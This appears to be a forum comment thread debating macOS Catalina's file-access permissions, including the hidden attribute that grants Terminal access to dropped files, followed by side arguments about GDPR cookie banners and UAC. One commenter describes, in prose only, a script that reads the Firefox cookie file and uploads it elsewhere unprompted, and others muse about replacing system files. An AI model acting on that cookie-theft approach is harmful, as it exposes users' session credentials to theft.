Assuming it's true - I've no reason to think otherwise but I'm not using a Mac at the mo so can't try it - this is fascinating. It has the ring of a quick workaround for something: in desperation we bung in a whole new capability for this, let's hope nobody notices, we'll do it properly in a later release. Is there a better explanation? If it is a grubby workaround, what would it have been a workaround for?
Good security or not, this entire system should not have been rolled out unless/until Apple had a sane UI for handing it. They don't.
I fucking hate it. Programs can write to my user dir and folders within it freely, but god forbid they touch my sacred Downloads, Documents, and Desktop folders! Better ask me first!
It's like it was made by the iOS dev team but also the iOS dev team has never used a computer before.
I had to add ruby to full disk access to get emacs to work, because emacs is launched by a ruby script and it was insane that I couldn't ls my Downloads folder from it.
Things like my complete shell history can be found there.
The average person doesn't need to care whether a file is executable or not.
(You can add individual apps to full disk access but it needs to be done manually for every new app you install.)
I have had the same thought for at least three years now.
Apple has managed to pull itself back in 2019 with Qualcomm Settlement ( Finally admitting they were dump enough to start the fight in the first place ) iPhone 11, Mac Pro and MacBook Pro 16". Not perfect, late, slow but at least they reacted on the Hardware side. ( And Apple Store is getting some love too )
But Software is taking a beating. And it has been for a few years in a row already, especially on macOS. Swift adoption and future is also not very clear. It seems sticking to Objective-C for another year would be safe bet. Catalyst and Swift UI maybe another blow to macOS as well, they may be good, but I have doubt whether they will be great.
In theory you could make the permission correspond to "everything in ~/ except dotfiles and Library", but that would be more confusing.
That said, the whole thing is a hack. The "proper" solution is/was App Sandbox, where the whole home directory is virtualized, and apps get a whitelist of what they can access rather than a blacklist. Much more secure! Too bad nobody adopted it.
(Oh, and don't forget that basically all older iOS devices contain a local vulnerability which cannot be fixed.)
This is also true of all "real" computers.
"For years", simply opening an app implicitly gave it access to most of the data on your hard drive. Regardless of whether you opened or dragged in a particular file.
In Catalina, Apple wanted to restrict this. As a consequence, in the initial release of Catalina, you could drag a file from your desktop into your Terminal, but your Terminal would be unable to access the file. Which of course is terrible UX!
So what Apple did in this update is give back the behavior you're describing: dragging a file into the Terminal implicitly grants the Terminal access. But unlike in old OS's, the Terminal doesn't suddenly get access to most of the other data on your hard drive as well.
Unfortunately, in order to walk that fine line, Apple had to add an extra, undocumented file attribute. And because Apple policy is for anything TCC-related should be SIP-protected, that attribute is protected by SIP and cannot be manually edited. And because a UI for revoking access to individual files would be a complete nightmare, there's no UI pathway either...
Apple's intentions with all of this absolutely make sense. The problem is that good intentions don't matter if the execution is flawed.
Why would this be a complete nightmare? There's no way to override a permission that's been granted to your ancestor - so why shouldn't the OS be able to remove the flag when you remove the permission in Settings? Why shouldn't the OS be able to maintain the invariant between the permissions dialog and the on-disk representation, given that the on-disk representation can only be set by the OS? That's just sad.
You could put it in the individual file's get info pane, but more users open that pane than know what the Terminal is.
This is the kind of setting you'd want to control via either the Terminal (ironically) or a third party app. But Apple has decided only Apple-supplied software with a UI is allowed to control TCC.
I'm replying to my own post many hours later, because something just occurred to me:
There’s no reason the Terminal or a third party shouldn’t be able to remove this attribute. Just restrict adding the attribute!
What happens if you want to revoke a kext? Delete the entry from the SQLite DB? Nah. Guess what, SIP prevents any and all deletions from that DB. You have to disable SIP to revoke a kext's permissions. And because the signature is not a hash, but instead a two-part vendor/product, it's entirely possible for a malicious version of an existing kext to be released that is then permitted by the signature.
As an admin with security focus, this to me seems completely backwards. I get that Apple don't want to make the permitting operation to be too difficult in the first place, because these are end-users we're talking about, but the lengths they go to in order to prevent the permissions being revoked is downright strange.
Put the access details in the Get Info of the files in Finder.
Citation needed. It is just a list. I don't see the "nightmare".
There are likely many better ways to handle these situations, but I'm not sure I really expect it from the recent Apple. The most recent Apple is recognizing issues (i.e. MacBook Pro keyboard), but I doubt the whole organization has caught up.
I think that's just what's happening.
As other commentators have noted, it reeks of last-minute-workaround to close what would otherwise be a high priority UI bug for the permissions dialogs.
It's not new.
There are few reasons to go to catalina.
I don't understand why there's no TCC kill switch, like there is for Gatekeeper and SIP. It's needed.
Terminal is a trusted app to me.
Actually, I probably won't be moving to catalina. I've been a diehard apple user since I got a G3, but the way apple is going their computers are too nerfed. It's like trying to get excited about buying a car from a rental car trade-in lot.
Security & Privacy -> Privacy -> Full disk access
This is a computer, not a phone.
Oh, wait, Apple's marketing...
In any case, the fact that the Terminal could be allowed to access all the disk has nothing to do with child processes being allowed to access all the disk.
However there are a lot of potentially sensitive files that could be trivially replaced by modified versions if this tactic works everywhere, i.e. /System/Library/Security/authorization.plist
⇧⌘G in Finder, type in /etc and press enter.
So if I do this "Terminal drop" thing on a plain file (like sudoers) I gain no special powers, Unix perms still apply. So maybe this only does something on directories.
Just press cmd-shift-dot.
cd /etc && open .
But it's the implementation that seems deeply flawed: that there's no obvious way to remove the permission afterwards, or even a record of it where you'd expect to look.
There seems to be a reasonable solution, however: as soon as the terminal window gets closed (and perhaps any background processes ended), the permissions get revoked. And even if your terminal process gets killed without cleanup, permissions would be revoked when your terminal app reboots or your computer restarts.
That could work, right?
Even simpler, if you write a small shell script with a hard-coded path in it that you run occasionally, you expect that script to keep running even across reboots. That means that, _if Terminal.app automatically adds a permission_, that permission has to be fairly permanent.
In both cases, under your suggested solution, both scripts would work when you test them, and then silently break when you close the terminal window.
I do wonder whether Terminal.app should automatically add that permission, though. If, instead of using emacs/pico/nano/vim, you use a GUI app to edit that script, that doesn’t happen, either, does it?
It's confusing. :-(
⇒ this special permission must either directly apply to all command-line tools or always be inherited on fork and/or execve (it cannot require a magic system call, as the command-line tool reading or writing data might not be Apple-supplied)
I can see how opening this door “just long enough” gets hairy very easily. So, as others suggest, this may have been implemented as a “OK, let’s do it this way for now, and try and figure out whether we can better later”.
I'm sure its not _that_ simple to implement in actuality, but from a back of the napkin design perspective its not too hard to appreciate.
What if the process forks? What if the process double-forks to become a daemon, and then Terminal quits? Who removes the xattr then when Terminal isn't even running? Does the kernel now remember that and need to do I/O when _exit(2) is called?
What if the process forks and itself exits? Does the permission gets revoked upon the parent process's exit and the child process's access suddenly get revoked? If so, does the opened file descriptor still works or it becomes unusable? If the file descriptor still works even though the on-disk file doesn't contain the permission xattr, would the file descriptor still continue to have special access when transmitted over a UNIX socket to an unrelated process? Do you instead track the original PGID instead of PID? Then what if setpgid(2) is called?
What if the system loses power and no one cleans up the permissions? Do you keep a log of files with such xattrs and clean them at next boot? What if at next boot the file system isn't mounted or mounted at a different mount point?
This is not the Apple I grew up with.
Why do you think this is the case?
Yes, logically, if I drag a file into the Terminal, I want Terminal to be able to access that file.
Should be documented somewhere, probably, but very clearly a positive change.
The Documents folder was not protected from Terminal before Catalina. Now, items in Documents are protected unless you explicitly drag them into Terminal-- but there's no way to "re-protect" them.
That is, at worst, users are in the situation they were before Catalina.
It is a good idea done via an undocumented hack.
The tracking has been through signed bookmarks, with no specific place for apps to persist this info. Keeping it in an xattr for ACLs seems like a great solution, and the exact opposite of a “hack”.
Now, the incentives of software vendors—even open source—have changed to include data exhilaration en masse. Off the top of my head:
* Games that scan and upload the file hierarchy of your system.
* Software sync packages that casually provide third parties for research (Dropbox).
* Keyloggers embedded in the default operating system (web search in windows start; Ubuntu web search; Siri web search.
* The push toward ever greater “telemetry”.
* Automatic background file uploads, like Microsoft defender sample submission.
* Pervasive ingestion of our data by governments.
The greatest threat to our security has become the vendors and government—the very entities whose job it is to protect us.
> Copy something to your clipboard, open a web page, and it can grab it, along with so much more.
Afaik this is not true .
How exactly are these keyloggers?
That's specifically for Windows Start. If Ubuntu or Siri "web searches" are clearly distinguished from OS searches, then of course I'd expect them to send data somewhere.
No, Google, I DIDN'T intend for you to snoop in my Mac ~/Downloads folder - that area is PRIVATE. So in a way it's good for user Privacy, Apple Inc.-aside.
I know there's been third-party macOS apps providing this 'filesystem firewall' functionality for years now, but it's nice to have some of it come from Apple directly.
I think I will eventually move to Linux, I just don't feel private on my own damn computer anymore. I don't trust Apple either. Or I will harden macOS more and more because of this abuse.
I assume Catalina would be the same, but I've never actually used Catalina. (And probably never will at this point.)
Apparently Apple doesn't remember, because they seem intent to make all the exact same mistakes.
Since I'm only hearing about this in a techie article about Terminal, I think it sounds completely different from Vista UAC.
Same with cookie acceptance popups - supposedly this is allowing the user to know the website uses a cookie blah blah, but you HAVE to press yes in most cases to go forward - so everyone has now been trained to auto click yes all the time. At this point those popups could say anything and at least 10% of users would still click yes.
I like the other approach. NO popup / warning unless something meaningfully unexpected.
The problem is there are bunch of warriors on the net and elsewhere that do things like claim that users hate cookies and won't accept them, so need to be warned of them by every website (which can still technically set cookies regardless of any popup). If users don't want cookies they can block them at the browser level - that's how you have actual control BTW - a scam site may not put up the cookie notice and may still be able to set the cookie.
Meanwhile - no notice required when your ISP tracks your every move AND is the monopoly provider. The internet folks have priorities totally backwards - so much focus on evil google it is ridiculous. The reason many people give google their entire search / email history is that they trust google more than the Chinese phone folks, the samsungs, the comcasts etc.
Some real actions to improve the net:
We need actual criminal prosecution and responsibility for websites distributing malware, browser exploits or downloadable.
Owner goes down even if it was their ad network, they can then sue the ad network and if they can recover from them great, if not they still pay for picking a crappy ad network. If their webhost was hacked they still pay for picking stupid web host, they can then sue webhost to recover.
We need to ban and criminally prosecute sale of info by places like ISPs and DMV's that are monopoly providers that have strong paid revenue streams already.
Tracking was being targeted, cookies were conflated with tracking (they are, but not really at the level that's being talked about), and some ineffectual legislation was passed to target cookies instead of tracking. It's almost as if the whole process was steered to that point to avoid any useful change with regard to online tracking...
If you think of the wasted power of a billion warning / notifications a day, you realize how little folks will pay attention to these warnings, it's the only way to get on with your life is to tune these warnings out.
SERIOUSLY - can't someone do a study in the EU showing that their constant warnings mean folks have totally tuned them out?
Here's how the GDPR options of an European website looks like: https://imgur.com/a/ckOivi7
That "Analytics Advertising Feature" MUST be unchecked by default. Only users that actually want to be tracked are tracked.
Every "tracking feature" (cookies, fingerprinting, IP tracking, whatever) must be hard opt-in, and the website has to provide an option for the user to opt-out if they change their mind.
If a website only use functional cookies (colours, session, login, cart, language) they don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar).
This is the official EU website.
EVERYONE is being trained to click I accept.
They are doing it right.
It is all the non-compliant companies with only the "Accept" button that are training users to click on it. Those cookie bars are not compliant with GDPR at all.
"Here's how the GDPR options of an European website looks like: https://imgur.com/a/ckOivi7 "
False, the EU website has an ugly cookie bar with a button called "I accept" that everyone has been trained to click yes on.
"That "Analytics Advertising Feature" MUST be unchecked by default. Only users that actually want to be tracked are tracked."
False, users can be presented with an accept / reject button on a standard cookie bar, clicking accept can opt them into tracking - please LOOK at the EU website example I provided.
"Every "tracking feature" (cookies, fingerprinting, IP tracking, whatever) must be hard opt-in."
This can be done though an accept button on a website that users have been trained to click yes on. My earlier suggestion that folks do a study on how many users navigate into these policies for every website they visit to make fine grained selections if such options are even available stands as well.
"If a website only use functional cookies (colours, session, login, cart, language) they don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar)."
I gave you an example of an ugly cookie bar on an EU website subject to GPDR - I can find many more.
This is the problem with these folks messing the net up. Everyone should do this / shouldn't do that, but no attention to what is actually happening.
I want to be clear, billion of pages are showing I accept buttons, some without reject buttons if they are disclosure only, some with reject buttons that kick you off the site, and some with reject buttons that opt you out of tracking, and users are being / have been trained by the EU alert notices / disclosure only notices (which generally DO have an I accept button) etc to waste their time clicking I accept everywhere.
This is bad for actual user choice, actual privacy.
Making money is not functionality to me. (Also, note that your website doesn't have to make money: I run my personal blog at a monetary loss, just like many other people.)
> The EU law says I have to disclose lots of stuff and get your consent before tracking you. So every website added a disclosure and consent button, and every user clicked on it.
Right, what they didn't realize that everyone would just make it super annoying in an attempt to lampoon the law instead of actually changing their behavior because they'd just make usage of their website conditional on it. Hence GDPR, where now users can actually click "no" and not be penalized for it.
- make money via advertising
- make money via advertising that tracks the user
- make money via advertising that tracks the user and hands over that data to a third party
- make money via advertising that tracks the user, hands over that data to a third party, and opens a security hole in doing so
I’m increasingly annoyed as I go down that list, but I might be willing to accept some of the behaviour at the top of it.
The user must opt-in of their own volition, must be able to reject the tracking cookies (or any kind of tracking) and must be able to opt-out later as well.
Btw: Functional cookies (colours, session, login, cart, language) don't need consent, just disclosure (and it doesn't have to be an ugly cookie bar).
Only cookies that are used to track user behavior, and can be tracked back to that particular user are disallowed. So things like Facebook like buttons would require consent (since Facebook will use the info gained to target you with ads in another context) while basic Google Analytics or similar is fine as it only presents aggregated data to the site owner and does not leak data cross-site. Some GA features do require consent though (like demographics tracking) as it requires Google to cross-reference between sites. You can generally turn these off (I think they even are off by default?)
Note that implementation of the law also differs between EU countries. So a few are more strict. It is up to the national privacy agency to set exact rules.
Most websites made it about cookies, but it does not contain that language.
> Meanwhile - no notice required when your ISP tracks your every move AND is the monopoly provider.
Yeah, no. Nobody likes their ISP, it's just that it's a lot harder to enact change here.
What I might not want is cookies from OTHER sites like Google being set and/or accessed by non-Google sites. But having worked at web startups, I know firsthand how important google analytics were, so I don’t know.
GDPR allows that, and you don't need consent, only disclosure, and you don't need an ugly cookie-bar.
This is also why if you access a website with a self-signed certificate, the browser will not give you a “yes” button to go through. You have to jump through a few hoops somewhere else (depending on browser) to accept the self-signed certificate, and then you can see the site.
I think this is the right choice!
I think a list of permissions with detailed explanations as to what they mean, and a Yes button, is a better approach.
Although there needs to be an option to disable or even mock certain permissions.
There is also no log what tells how the app uses the permission. It would be nice if there was a log of each use of the granted permission.
Dropbox, for example, was recently in the news for silently granting itself accessibility permission, and Apple had to update the OS to prevent them from doing it. They still beg users to grant them this, even lying (EDIT: misleading users) on their web page about the purpose of the permission .
[EDITed instead of replying because HN limits the number of posts I can make for whatever reason.]
It's certainly a powerful ability, and I can completely understand not wanting to grant it, but realize that the need is legitimate (and non-malicious) in a lot of cases.
1: The first sentence in Apple’s accessibility API docs is: “Accessible apps help users with disabilities access information and information technology.“ I think they are very clear about the purpose of these, and it’s not “to do cool innovative things missing from the regular API”.
> I think they are very clear about the purpose of these, and it's not "to do cool innovative things missing from the regular API".
The button doesn't say "yes", but at least on FF there's a way to bypass the warning with one or two clicks from the error page itself. I think you might be confusing this with HSTS, where a certificate failure on an HSTS-enabled website will not let users bypass the warning (and for good reason).
The UAC prompt is essentially "sudo" - it grants root to whatever program is running. You really can't really implement a more granular permissions system without significant engineering effort, because you need to ensure that granting one permission doesn't result in privilege escalation. For instance, granting permissions to modify Program Files/Windows directory can be abused to get steal permissions from other applications, by replacing existing executables with malicious ones.
>Android permission prompts are way better.
Not really comparable because "regular" Windows programs aren't sandboxed. So they kinda already all the android "permissions" already (eg. contacts - they can simply read off disk). A better comparison would be root, which essentially has the same ux as Windows UAC.
I personally leave it on, it is a nice "free" fail-safe but you be you.
Most machines are effective single-user so security boundaries between user accounts are not very useful.
Restricting the freedom of applications is a good thing, for example I don't want steam games to be able to read my email.
And even the casual users in my circle think that he permission jungle on phones or tablets is unworkable and intransparent after a while. A flood of apps that cannot be trusted from a commercial shop tends to be the larger security threat.
Big Brother knows what's best?
For decades the Mac has trusted the user, what would be different now other than the company having the largest ever pro user base? Why assume pro users don't know what they are doing?
Why the turnaround 10 years later? Is OS X now such a popular desktop OS that it's being attacked in a ways that weren't mainstream back then?
-rw-r--r--@ 1 aaaaaaa staff 2571 Sep 15 2017 config~
that file remains read-only to me. what is going on?
Isn't that like a Vim backup file? Or that's the copy you renamed?
I had an XCode project sitting in folder on desktop. Small utility that I modify frequently.
After Catalina upgrade compilation of that project stopped working.
XCode started complaining "file is inaccessible" or something like that. Peculiarity is that you can open that file from IDE through Open containing folder / Finder.
And XCode provides absolutely no clue why it cannot access files of the project...
Road that is seeded by such good intentions goes where?
Plus, if drag-and-drop somehow enables Terminal to get that file permission, then I guess either of two things: (a) Terminal is special -cased to be the only such app capable of gaining that kind of permission from a drag-and-drop, in which case well why didn't they just grant it permission from the start; or (b) it can be exploited by any other app to gain similar permissions on drag-and-drop of a file onto the app... ?
How is this our fault?
This is where I closed the article.
1) I granted full disk access to iTerm2. Later I removed them in the UI and I can still do everything in iTerm.
2) I have "Documents" granted to a Java app. Tried opening or saving a file in various locations and didn't notice any restriction other than my ordinary UNIX user's
3) I created an app bundle containing a plain shell script that reads my firefox cookie file and curls the file somewhere. This app runs just fine with no prompt whatsoever.
Am I being stupid here or what's up?
First of all, I can see how this functionality is oriented towards the average Joe, not developers, sysadmins or hackers in general.
This helps the user, to an extent, to protect his assets from malware or accidents.
Also, it is undocumented, probably for a reason, this could be an early version that will be evolved and announced once the feel comfortable.
They are unsystematicaly doing whatever the hell they like, without regard to consistency or compatibility.
Did you just change the permissions on that file? That’s against the rules isn’t it?
I feel like that was the pinnacle of Apple hardware/software.
(I have very strong feelings about individual OS X versions)